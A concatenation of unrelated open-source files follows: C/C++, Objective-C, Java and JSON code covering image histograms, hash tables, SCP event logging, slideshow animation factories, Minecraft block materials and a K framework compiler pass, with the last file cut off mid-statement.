// // DSEmotionToolbar.h // DSLolita // // Created by <NAME> on 15/5/28. // Copyright (c) 2015年 samDing. All rights reserved. // #import <UIKit/UIKit.h> @class DSEmotionToolbar; typedef enum { DSEmotionTypeRecent = 1, DSEmotionTypeDefault , DSEmotionTypeEmoji, DSEmotionTypeLxh }DSEmotionTYype; @protocol DSEmotionToolbarDelegate <NSObject> @optional -(void)emotionToolbar:(DSEmotionToolbar *)toolbar didSelectedButton:(DSEmotionTYype)emotionType; @end @interface DSEmotionToolbar : UIView @property (nonatomic , assign) DSEmotionTYype currentButtonType; @property (nonatomic , weak) id<DSEmotionToolbarDelegate>delegate; @end
250
1,104
<gh_stars>1000+ { "html": "heartbeats.html", "css": "heartbeats.css", "authors": "<NAME>", "roll20userid": "1332302", "preview": "heartbeats.png", "instructions": "A sheet for Heartbeats in Perfect Sync by <NAME>." }
93
606
<reponame>zjcs/ICE-BA<gh_stars>100-1000 /****************************************************************************** * Copyright 2017-2018 Baidu Robotic Vision Authors. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *****************************************************************************/ #include <glog/logging.h> #include "image_utils.h" //#include <driver/xp_aec_table.h> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui.hpp> #include <boost/lexical_cast.hpp> #include <iostream> #ifndef __DEVELOPMENT_DEBUG_MODE__ #define __IMAGE_UTILS_NO_DEBUG__ #endif namespace XP { // only use central area in the image constexpr int kMarginRow = 50; constexpr int kMarginCol = 100; constexpr int kPixelStep = 2; // Compute the histogram of a sampled area of the input image and return the number of // sampled pixels // [NOTE] This function is hardcoded for VGA / WVGA images for now int sampleBrightnessHistogram(const cv::Mat& raw_img, std::vector<int>* histogram, int* avg_pixel_val_ptr) { const int end_row = raw_img.rows - kMarginRow; const int end_col = raw_img.cols - kMarginCol; // Given the current algorithm, collecting histogram is not // necessary. But we still do so in case later we switch to a better // algorithm int pixel_num = 0; int avg_pixel_val = 0; histogram->clear(); histogram->resize(256, 0); int over_exposure_pixel_num = 0; for (int i = kMarginRow; i < end_row; i += kPixelStep) { for (int j = kMarginCol; j < end_col; j += kPixelStep) { const uint8_t pixel_val = raw_img.data[i * raw_img.cols + j]; avg_pixel_val += pixel_val; (*histogram)[pixel_val]++; ++pixel_num; } } if (avg_pixel_val_ptr) { *avg_pixel_val_ptr = avg_pixel_val / pixel_num; } return pixel_num; } // [NOTE] Instead of matching the cdf(s), we brute-force scale the histograms and match them // directly. This matchingHistogram is intended to match two histograms of images taken with // different gain/exposure settings. float matchingHistogram(const std::vector<int>& hist_src, const std::vector<int>& hist_tgt, const float init_scale) { std::vector<int> cdf_tgt(256); cdf_tgt[0] = hist_tgt[0]; for (int i = 1; i < 256; ++i) { cdf_tgt[i] = hist_tgt[i] + cdf_tgt[i - 1]; } constexpr float delta_scale = 0.02; float best_scale = -1.f; // an invalid value int best_cdf_L1_dist = std::numeric_limits<int>::max(); for (int s = -4; s < 5; ++s) { float scale = init_scale + s * delta_scale; std::vector<int> hist_src_scale(256, 0); for (int i = 0; i < 256; ++i) { int si = i * scale; if (si >= 255) { int tmp_acc = 0; for (int j = i; j < 256; ++j) { tmp_acc += hist_src[j]; } hist_src_scale[255] = tmp_acc; break; } hist_src_scale[si] = hist_src_scale[si] + hist_src[i]; } int cdf_L1_dist = 0; int cdf_src_cumsum = 0; for (int i = 0; i < 256; ++i) { cdf_src_cumsum += hist_src_scale[i]; int L1_dist = std::abs(cdf_src_cumsum - cdf_tgt[i]); cdf_L1_dist += L1_dist; } // We simply assume these histograms are sampled from the same size of images CHECK_EQ(cdf_src_cumsum, cdf_tgt[255]); VLOG(1) << "scale = " << scale << " cdf_L1_dist = " << cdf_L1_dist; if (cdf_L1_dist < best_cdf_L1_dist) { best_scale = scale; best_cdf_L1_dist = cdf_L1_dist; if (VLOG_IS_ON(3)) { cv::Mat hist_canvas; const int scale = 2; const int height = 64 * scale; const int width = 256 * scale; hist_canvas.create(height * 2, width, CV_8UC3); hist_canvas.setTo(0x00); cv::Mat hist_img_src = hist_canvas(cv::Rect(0, 0, width, height)); drawHistogram(&hist_img_src, hist_src_scale); cv::Mat hist_img_tgt = hist_canvas(cv::Rect(0, height, width, height)); drawHistogram(&hist_img_tgt, hist_tgt); cv::imshow("matchingHistogram", hist_canvas); cv::waitKey(0); } } } CHECK_GT(best_scale, 0.f); VLOG(1) << "best scale = " << best_scale << " cdf_L1_dist = " << best_cdf_L1_dist; return best_scale; } void drawHistogram(cv::Mat* img_hist, const std::vector<int>& histogram) { // Get some stats of this histogram const int N = static_cast<int>(histogram.size()); int total_num = 0; int avg_pixel_val = 0; for (int i = 0; i < N; ++i) { total_num += histogram[i]; avg_pixel_val += histogram[i] * i; } avg_pixel_val /= total_num; int acc_pixel_counts = 0; int median_pixel_val; for (int i = 0; i < N; ++i) { acc_pixel_counts += histogram[i]; if (acc_pixel_counts >= total_num / 2) { median_pixel_val = i; break; } } const int scale = 2; const int width = N * scale + 1; const int height = 64 * scale; CHECK_NOTNULL(img_hist); if (img_hist->rows == 0) { img_hist->create(height, width, CV_8UC3); } img_hist->setTo(0x00); float hist_max = 0.1f; // scale the max y axis to 10% for (int i = 0; i < N; ++i) { float val = static_cast<float>(histogram[i]) / total_num / hist_max; cv::Rect rect(i * scale, height * (1 - val), scale, height * val); cv::rectangle(*img_hist, rect, cv::Scalar(0, 0, 255)); } cv::putText(*img_hist, "mean: " + boost::lexical_cast<std::string>(avg_pixel_val), cv::Point(15, 15), cv::FONT_HERSHEY_SIMPLEX, .5, cv::Scalar(255, 255, 255)); cv::putText(*img_hist, "median: " + boost::lexical_cast<std::string>(median_pixel_val), cv::Point(15, 30), cv::FONT_HERSHEY_SIMPLEX, .5, cv::Scalar(255, 255, 255)); } } // namespace XP
2,622
629
<filename>hardware/laser/include/laser/ros/laser_nodelet.h /* Copyright (c) 2017, United States Government, as represented by the * Administrator of the National Aeronautics and Space Administration. * * All rights reserved. * * The Astrobee platform is licensed under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with the * License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations * under the License. */ #ifndef LASER_ROS_LASER_NODELET_H_ #define LASER_ROS_LASER_NODELET_H_ #include <pluginlib/class_list_macros.h> #include <ros/ros.h> #include <ros/service_server.h> #include <config_reader/config_reader.h> #include <ff_hw_msgs/SetEnabled.h> #include <ff_util/ff_names.h> #include <ff_util/ff_nodelet.h> #include <i2c/i2c_new.h> #include <laser/laser.h> #include <memory> #include <stdexcept> #include <string> #include <system_error> // NOLINT namespace laser { namespace ros { class LaserNodelet : public ::ff_util::FreeFlyerNodelet { public: LaserNodelet(); ~LaserNodelet(); bool OnService(::ff_hw_msgs::SetEnabled::Request &req, ::ff_hw_msgs::SetEnabled::Response &resp); protected: virtual void Initialize(::ros::NodeHandle *nh); private: using LaserPtr = std::unique_ptr<Laser>; LaserPtr laser_; ::ros::ServiceServer server_; }; } // namespace ros } // namespace laser #endif // LASER_ROS_LASER_NODELET_H_
614
5,169
<reponame>Gantios/Specs { "name": "SNAugusPopView", "version": "0.1.1", "summary": "A very lightweight popView.", "description": "The popView support some directions of arrow,and show gradient and border effect.", "homepage": "https://github.com/venn0126/SNAugusPopView", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "venn0126": "<EMAIL>" }, "source": { "git": "https://github.com/venn0126/SNAugusPopView.git", "tag": "0.1.1" }, "platforms": { "ios": "9.0" }, "source_files": "SNAugusPopView/Classes/**/*" }
247
14,499
/* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ import javax.annotation.concurrent.ThreadSafe; // Test may_alias treatment of arrays // two arrays of types in a subtype relation may alias, and race @ThreadSafe class Parent {} @ThreadSafe class Child extends Parent {} @ThreadSafe class Arrays { Child[] childArr = new Child[5]; Parent[] parentArr = childArr; // actual aliasing not required, but for documentation final String[] strArr1 = new String[5]; final String[] strArr2 = new String[5]; void arrayParameterWriteBad(int[] name1) { name1[2] = 4; } // although name1 and name2 may alias, we have no reason to think that they will. don't report int FN_arrayParameterReadBad(int[] name2) { return name2[2]; } int arrayParameterLiteralReadOk() { return (new int[] {2, 3})[1]; } public void writeWriteRaceBad(String s) { strArr1[2] = s; } // same array public String readWriteRaceBad(String s) { synchronized (this) { strArr1[2] = s; } return strArr1[2]; } // arrays are same type, but can't alias public String notReadWriteRace1Ok(String s) { synchronized (this) { strArr1[0] = s; } return strArr2[0]; } // arrays are compatible types and can alias public Child FN_readWriteAliasRaceBad() { synchronized (this) { parentArr[3] = null; } return childArr[3]; } String[] type1Arr[]; Parent[] type2Arr; // arrays are different types and thus cannot alias public Parent noRaceOk() { synchronized (this) { type1Arr[3] = null; } return type2Arr[3]; } }
616
1,253
#include<bits/stdc++.h> using namespace std; void call (vector<string>& ans, string st, int A, int cur){ if(cur==0 && A==0){ ans.push_back(st); return ; } if(cur==0){ st+='('; call(ans,st,A-1,1); return ; } if(A){ call(ans,st+'(',A-1,cur+1); call(ans,st+')',A,cur-1); return ; } while(cur){ st= st+')'; cur--; } ans.push_back(st); return ; } vector<string> generateParenthesis(int A) { vector<string> ans; string st; call(ans, st, A, 0); return ans; } int main() { cout<<"Enter the number: "; int n; cin>>n; vector<string> ans=generateParenthesis(n); for(int i=0;i<ans.size();i++) cout<<"valid Parenthesis "<<ans[i]<<endl; }
470
376
<reponame>alphavip/friso /* * friso hash table functions implementation defined in header file "friso_API.h". * @author lionsoul<<EMAIL>> */ #include "friso_API.h" #include <stdlib.h> #include <string.h> //-166411799L //31 131 1331 13331 133331 .. //31 131 1313 13131 131313 .. the best #define HASH_FACTOR 1313131 /* ************************ * mapping function area * **************************/ __STATIC_API__ uint_t hash( fstring str, uint_t length ) { //hash code uint_t h = 0; while ( *str != '\0' ) { h = h * HASH_FACTOR + ( *str++ ); } return (h % length); } /*test if a integer is a prime.*/ __STATIC_API__ int is_prime( int n ) { int j; if ( n == 2 || n == 3 ) { return 1; } if ( n == 1 || n % 2 == 0 ) { return 0; } for ( j = 3; j * j < n; j++ ) { if ( n % j == 0 ) { return 0; } } return 1; } /*get the next prime just after the speicified integer.*/ __STATIC_API__ int next_prime( int n ) { if ( n % 2 == 0 ) n++; for ( ; ! is_prime( n ); n = n + 2 ) ; return n; } //fstring copy, return the pointer of the new string. //static fstring string_copy( fstring _src ) { //int bytes = strlen( _src ); //fstring _dst = ( fstring ) FRISO_MALLOC( bytes + 1 ); //register int t = 0; //do { //_dst[t] = _src[t]; //t++; //} while ( _src[t] != '\0' ); //_dst[t] = '\0'; //return _dst; //} /* ********************************* * static hashtable function area. * ***********************************/ __STATIC_API__ hash_entry_t new_hash_entry( fstring key, void * value, hash_entry_t next ) { hash_entry_t e = ( hash_entry_t ) FRISO_MALLOC( sizeof( friso_hash_entry ) ); if ( e == NULL ) { ___ALLOCATION_ERROR___ } //e->_key = string_copy( key ); e->_key = key; e->_val = value; e->_next = next; return e; } //create blocks copy of entries. __STATIC_API__ hash_entry_t * create_hash_entries( uint_t blocks ) { register uint_t t; hash_entry_t *e = ( hash_entry_t * ) FRISO_CALLOC( sizeof( hash_entry_t ), blocks ); if ( e == NULL ) { ___ALLOCATION_ERROR___ } for ( t = 0; t < blocks; t++ ) { e[t] = NULL; } return e; } //a static function to do the re-hash work. __STATIC_API__ void rebuild_hash( friso_hash_t _hash ) { //printf("rehashed.\n"); //find the next prime as the length of the hashtable. uint_t t, length = next_prime( _hash->length * 2 + 1 ); hash_entry_t e, next, *_src = _hash->table, \ *table = create_hash_entries( length ); uint_t bucket; //copy the nodes for ( t = 0; t < _hash->length; t++ ) { e = *( _src + t ); if ( e != NULL ) { do { next = e->_next; bucket = hash( e->_key, length ); e->_next = table[bucket]; table[bucket] = e; e = next; } while ( e != NULL ); } } _hash->table = table; _hash->length = length; _hash->threshold = ( uint_t ) ( _hash->length * _hash->factor ); //free the old hash_entry_t blocks allocations. FRISO_FREE( _src ); } /* ******************************** * hashtable interface functions. * * ********************************/ //create a new hash table. FRISO_API friso_hash_t new_hash_table( void ) { friso_hash_t _hash = ( friso_hash_t ) FRISO_MALLOC( sizeof ( friso_hash_cdt ) ); if ( _hash == NULL ) { ___ALLOCATION_ERROR___ } //initialize the the hashtable _hash->length = DEFAULT_LENGTH; _hash->size = 0; _hash->factor = DEFAULT_FACTOR; _hash->threshold = ( uint_t ) ( _hash->length * _hash->factor ); _hash->table = create_hash_entries( _hash->length ); return _hash; } FRISO_API void free_hash_table( friso_hash_t _hash, fhash_callback_fn_t fentry_func ) { register uint_t j; hash_entry_t e, n; for ( j = 0; j < _hash->length; j++ ) { e = *( _hash->table + j ); for ( ; e != NULL ; ) { n = e->_next; if ( fentry_func != NULL ) fentry_func(e); FRISO_FREE( e ); e = n; } } //free the pointer array block ( 4 * htable->length continuous bytes ). FRISO_FREE( _hash->table ); FRISO_FREE( _hash ); } //put a new mapping insite. //the value cannot be NULL. FRISO_API void *hash_put_mapping( friso_hash_t _hash, fstring key, void * value ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e = *( _hash->table + bucket ); void *oval = NULL; //check the given key is already exists or not. for ( ; e != NULL; e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 ) ) { oval = e->_val; //bak the old value e->_key = key; e->_val = value; return oval; } } //put a new mapping into the hashtable. _hash->table[bucket] = new_hash_entry( key, value, _hash->table[bucket] ); _hash->size++; //check the condition to rebuild the hashtable. if ( _hash->size >= _hash->threshold ) { rebuild_hash( _hash ); } return oval; } //check the existence of the mapping associated with the given key. FRISO_API int hash_exist_mapping( friso_hash_t _hash, fstring key ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e; for ( e = *( _hash->table + bucket ); e != NULL; e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 )) { return 1; } } return 0; } //get the value associated with the given key. FRISO_API void *hash_get_value( friso_hash_t _hash, fstring key ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e; for ( e = *( _hash->table + bucket ); e != NULL; e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 )) { return e->_val; } } return NULL; } //remove the mapping associated with the given key. FRISO_API hash_entry_t hash_remove_mapping( friso_hash_t _hash, fstring key ) { uint_t bucket = ( key == NULL ) ? 0 : hash( key, _hash->length ); hash_entry_t e, prev = NULL; hash_entry_t b; for ( e = *( _hash->table + bucket ); e != NULL; prev = e, e = e->_next ) { if ( key == e->_key || ( key != NULL && e->_key != NULL && strcmp( key, e->_key ) == 0 ) ) { b = e; //the node located at *( htable->table + bucket ) if ( prev == NULL ) { _hash->table[bucket] = e->_next; } else { prev->_next = e->_next; } //printf("%s was removed\n", b->_key); _hash->size--; //FRISO_FREE( b ); return b; } } return NULL; } //count the size.(A macro define has replace this.) //FRISO_API uint_t hash_get_size( friso_hash_t _hash ) { // return _hash->size; //}
3,404
501
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.sshd.cli.server.helper; import java.io.IOException; import java.nio.file.Path; import java.nio.file.attribute.PosixFilePermission; import java.util.Set; import org.apache.sshd.common.session.Session; import org.apache.sshd.scp.common.ScpTransferEventListener; import org.apache.sshd.scp.common.helpers.ScpAckInfo; import org.apache.sshd.scp.server.ScpCommandFactory; import org.slf4j.Logger; /** * @author <a href="mailto:<EMAIL>">Apache MINA SSHD Project</a> */ public class ScpCommandTransferEventListener extends ServerEventListenerHelper implements ScpTransferEventListener { public ScpCommandTransferEventListener(Logger logger) { super(ScpCommandFactory.SCP_FACTORY_NAME, logger); } @Override public void startFileEvent( Session session, FileOperation op, Path file, long length, Set<PosixFilePermission> perms) throws IOException { if (log.isInfoEnabled()) { log.info("startFileEvent({})[{}] len={}, perms={}: {}", session, op, length, perms, file); } } @Override public void endFileEvent( Session session, FileOperation op, Path file, long length, Set<PosixFilePermission> perms, Throwable thrown) throws IOException { if (thrown != null) { log.error("endFileEvent({})[{}] failed ({}) len={}, perms={} [{}]: {}", session, op, thrown.getClass().getSimpleName(), length, perms, file, thrown.getMessage()); } else if (log.isInfoEnabled()) { log.info("endFileEvent({})[{}] len={}, perms={}: {}", session, op, length, perms, file); } } @Override public void startFolderEvent(Session session, FileOperation op, Path file, Set<PosixFilePermission> perms) throws IOException { if (log.isInfoEnabled()) { log.info("startFolderEvent({})[{}] perms={}: {}", session, op, perms, file); } } @Override public void endFolderEvent( Session session, FileOperation op, Path file, Set<PosixFilePermission> perms, Throwable thrown) throws IOException { if (thrown != null) { log.error("endFolderEvent({})[{}] failed ({}) perms={} [{}]: {}", session, op, thrown.getClass().getSimpleName(), perms, file, thrown.getMessage()); } else if (log.isInfoEnabled()) { log.info("endFolderEvent({})[{}] perms={}: {}", session, op, perms, file); } } @Override public void handleFileEventAckInfo( Session session, FileOperation op, Path file, long length, Set<PosixFilePermission> perms, ScpAckInfo ackInfo) throws IOException { if (log.isInfoEnabled()) { log.info("handleFileEventAckInfo({})[{}] perms={}, length={}, ACK={}: {}", session, op, perms, length, ackInfo, file); } } }
1,418
682
<reponame>sk89q/WorldEdit /* * WorldEdit, a Minecraft world manipulation toolkit * Copyright (C) sk89q <http://www.sk89q.com> * Copyright (C) WorldEdit team and contributors * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ package com.sk89q.worldedit.sponge; import com.sk89q.worldedit.world.registry.BlockMaterial; import com.sk89q.worldedit.world.registry.PassthroughBlockMaterial; import net.minecraft.world.level.block.state.BlockState; import net.minecraft.world.level.material.Material; import net.minecraft.world.level.material.PushReaction; import javax.annotation.Nullable; /** * Sponge block material that pulls as much info as possible from the Minecraft * Material, and passes the rest to another implementation, typically the * bundled block info. */ public class SpongeBlockMaterial extends PassthroughBlockMaterial { private final Material delegate; private final BlockState block; public SpongeBlockMaterial(Material delegate, BlockState block, @Nullable BlockMaterial secondary) { super(secondary); this.delegate = delegate; this.block = block; } @Override public boolean isAir() { return delegate == Material.AIR || super.isAir(); } @Override public boolean isOpaque() { return delegate.isSolidBlocking(); } @Override public boolean isLiquid() { return delegate.isLiquid(); } @Override public boolean isSolid() { return delegate.isSolid(); } @Override public boolean isFragileWhenPushed() { return delegate.getPushReaction() == PushReaction.DESTROY; } @Override public boolean isUnpushable() { return delegate.getPushReaction() == PushReaction.BLOCK; } @Override public boolean isMovementBlocker() { return delegate.blocksMotion(); } @Override public boolean isBurnable() { return delegate.isFlammable(); } @Override public boolean isToolRequired() { return block.requiresCorrectToolForDrops(); } @Override public boolean isReplacedDuringPlacement() { return delegate.isReplaceable(); } }
888
679
<reponame>Grosskopf/openoffice<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef INCLUDED_SLIDESHOW_ACTIVITIESFACTORY_HXX #define INCLUDED_SLIDESHOW_ACTIVITIESFACTORY_HXX #include <com/sun/star/animations/XAnimate.hpp> #include <com/sun/star/animations/XAnimateColor.hpp> #include "animationactivity.hxx" #include "activitiesqueue.hxx" #include "event.hxx" #include "eventqueue.hxx" #include "shape.hxx" #include "numberanimation.hxx" #include "enumanimation.hxx" #include "coloranimation.hxx" #include "hslcoloranimation.hxx" #include "stringanimation.hxx" #include "boolanimation.hxx" #include "pairanimation.hxx" #include <boost/optional.hpp> #include <boost/utility.hpp> /* Definition of ActivitiesFactory class */ namespace slideshow { namespace internal { class ActivitiesFactory : private ::boost::noncopyable { public: /// Collection of common factory parameters struct CommonParameters { CommonParameters( const EventSharedPtr& rEndEvent, EventQueue& rEventQueue, ActivitiesQueue& rActivitiesQueue, double nMinDuration, sal_uInt32 nMinNumberOfFrames, bool bAutoReverse, ::boost::optional<double> const& aRepeats, double nAcceleration, double nDeceleration, const ShapeSharedPtr& rShape, const ::basegfx::B2DVector& rSlideBounds ) : mpEndEvent( rEndEvent ), mrEventQueue( rEventQueue ), mrActivitiesQueue( rActivitiesQueue ), mnMinDuration( nMinDuration ), mnMinNumberOfFrames( nMinNumberOfFrames ), maRepeats( aRepeats ), mnAcceleration( nAcceleration ), mnDeceleration( nDeceleration ), mpShape( rShape ), maSlideBounds( rSlideBounds ), mbAutoReverse( bAutoReverse ) {} /// End event to fire when animation is over EventSharedPtr mpEndEvent; /// Event queue to insert the end event into. EventQueue& mrEventQueue; /// Event queue to insert the end event into. ActivitiesQueue& mrActivitiesQueue; /** Simple duration of the activity Specifies the minimal simple duration of the activity (minimal, because mnMinNumberOfFrames might prolongue the activity). According to SMIL, this might also be indefinite, which for our framework does not make much sense, though (wouldn't have a clue, then, how to scale the animation over time). */ double mnMinDuration; /** Minimal number of frames for this activity. This specifies the minimal number of frames this activity will display per simple duration. If less than this number are displayed until mnMinDuration is over, the activity will be prolongued until mnMinNumberOfFrames are rendered. */ sal_uInt32 mnMinNumberOfFrames; /** Number of repeats for the simple duration This specified the number of repeats. The mnMinDuration times maRepeats yields the total duration of this activity. If this value is unspecified, the activity will repeat indefinitely. */ ::boost::optional<double> const maRepeats; /// Fraction of simple time to accelerate animation double mnAcceleration; /// Fraction of simple time to decelerate animation double mnDeceleration; /// Shape, to get bounds from ShapeSharedPtr mpShape; /// LayerManager, to get page size from ::basegfx::B2DVector maSlideBounds; /// When true, activity is played reversed after mnDuration. bool mbAutoReverse; }; /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a double value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const NumberAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a double value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const EnumAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a color value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const ColorAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a color value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const HSLColorAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimateColor >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a pair of double values. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const PairAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a string. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const StringAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create an activity from an XAnimate node. This method creates an animated activity from the given XAnimate node, extracting all necessary animation parameters from that. Note that due to the animator parameter, the animation values must be convertible to a bool value. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param xNode The SMIL animation node to animate */ static AnimationActivitySharedPtr createAnimateActivity( const CommonParameters& rParms, const BoolAnimationSharedPtr& rAnimator, const ::com::sun::star::uno::Reference< ::com::sun::star::animations::XAnimate >& xNode ); /** Create a simple activity for the given animator This method is suited to create activities for custom animations, which need a simple double value and lasts a given timespan. This activity always generates values from the [0,1] range. @param rParms Factory parameter structure @param rAnimator Animator sub-object @param bDirectionForward If true, the activity goes 'forward', i.e. from 0 to 1. With false, the direction is reversed. */ static AnimationActivitySharedPtr createSimpleActivity( const CommonParameters& rParms, const NumberAnimationSharedPtr& rAnimator, bool bDirectionForward ); private: // default: constructor/destructor disabed ActivitiesFactory(); ~ActivitiesFactory(); }; } // namespace internal } // namespace presentation #endif /* INCLUDED_SLIDESHOW_ACTIVITIESFACTORY_HXX */
5,500
335
<gh_stars>100-1000 package moze_intel.projecte.rendering.entity; import javax.annotation.Nonnull; import moze_intel.projecte.PECore; import moze_intel.projecte.gameObjs.entity.EntityWaterProjectile; import net.minecraft.client.renderer.entity.EntityRendererManager; import net.minecraft.util.ResourceLocation; public class WaterOrbRenderer extends EntitySpriteRenderer<EntityWaterProjectile> { public WaterOrbRenderer(EntityRendererManager manager) { super(manager); } @Nonnull @Override public ResourceLocation getEntityTexture(@Nonnull EntityWaterProjectile entity) { return PECore.rl("textures/entity/water_orb.png"); } }
207
404
<reponame>nrdxp/k // Copyright (c) 2018-2019 K Team. All Rights Reserved. package org.kframework.compile; import org.kframework.attributes.Att; import org.kframework.builtin.KLabels; import org.kframework.builtin.Sorts; import org.kframework.builtin.BooleanUtils; import org.kframework.definition.Context; import org.kframework.definition.Module; import org.kframework.definition.Rule; import org.kframework.definition.Sentence; import org.kframework.kore.*; import java.util.HashMap; import java.util.HashSet; import java.util.Map; import java.util.Set; import static org.kframework.kore.KORE.*; public class MinimizeTermConstruction { private final Set<KVariable> vars = new HashSet<>(); private final Map<K, KVariable> cache = new HashMap<>(); private final Set<K> usedOnRhs = new HashSet<>(); private final Module module; public MinimizeTermConstruction(Module module) { this.module = module; } void resetVars() { vars.clear(); cache.clear(); usedOnRhs.clear(); counter = 0; } private Rule resolve(Rule rule) { if (rule.att().contains(Att.SIMPLIFICATION())) { return rule; } resetVars(); gatherVars(rule.body()); gatherVars(rule.requires()); gatherVars(rule.ensures()); gatherTerms(rule.body(), true); gatherTerms(rule.requires(), false); gatherTerms(rule.ensures(), false); filterTerms(rule.body(), true); filterTerms(rule.requires(), false); filterTerms(rule.ensures(), false); return new Rule( transform(rule.body(), true), transform(rule.requires(), false), transform(rule.ensures(), false), rule.att()); } private Context resolve(Context context) { resetVars(); gatherVars(context.body()); gatherVars(context.requires()); gatherTerms(context.body(), true); gatherTerms(context.requires(), false); filterTerms(context.body(), true); filterTerms(context.requires(), false); return new Context( transform(context.body(), true), transform(context.requires(), false), context.att()); } public synchronized Sentence resolve(Sentence s) { if (s instanceof Rule) { return resolve((Rule) s); } else if (s instanceof Context) { return resolve((Context) s); } else { return s; } } void gatherVars(K term) { new VisitK() { @Override public void apply(KVariable v) { vars.add(v); super.apply(v); } }.apply(term); } void gatherTerms(K term, boolean body) { AddSortInjections sorts = new AddSortInjections(module); new RewriteAwareVisitor(body, new HashSet<>()) { @Override public void apply(K k) { if (isLHS() && !isRHS() && !(k instanceof KVariable) && !atTop && !k.equals(BooleanUtils.TRUE)) { cache.put(k, newDotVariable(sorts.sort(k, Sorts.K()))); } atTop = false; super.apply(k); } boolean atTop = false; @Override public void apply(KRewrite rew) { if (rew == term) { atTop = true; } super.apply(rew); } @Override public void apply(KApply k) { if (k.klabel().head().equals(KLabels.ML_OR)) { return; } String hook = 